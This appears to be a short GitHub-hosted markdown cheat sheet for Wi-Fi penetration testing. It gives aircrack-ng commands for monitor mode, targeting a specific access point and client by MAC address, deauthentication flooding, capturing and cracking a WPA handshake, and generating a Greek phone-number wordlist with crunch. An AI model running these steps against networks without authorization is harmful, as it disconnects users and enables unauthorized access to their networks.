Skip to content

Latest commit

 

History

History
32 lines (24 loc) · 1.12 KB

wifi-pentest.md

File metadata and controls

32 lines (24 loc) · 1.12 KB

setup wireless adapter

  • vbox usb passthrough: add $USER to vboxusers group to allow usb passthrough

Steps

setup interface

  • airmon-ng check kill
  • systemctl stop
  • airmon-ng start

monitor wifi networks

  • airodump-ng
  • pick out bssid's that have clients (stations) associated with them

focus on a specific target

  • airodump-ng --bssid -c --write
    e.g. airodump-ng --bssid 74:9D:79:23:A0:E4 -c 6 --write vodafone_2125 wlp0s20f0u2mon

deauthenticate

  • aireplay-ng --deauth 100 -a -c <client_mac>
    e.g. aireplay-ng --deauth 100 wlp0s20f0u2mon -a 74:9D:79:23:A0:E4 -c 48:4B:AA:86:94:4B
  • wait for the message "WPA handshake" to appear in the previous step's airdump screen

crack the hash

  • aircrack-ng -w

generate 10-digit phone numbers with crunch

  • ./crunch 10 10 -t 210%%%%%%% -o athens.txt

greek wordlists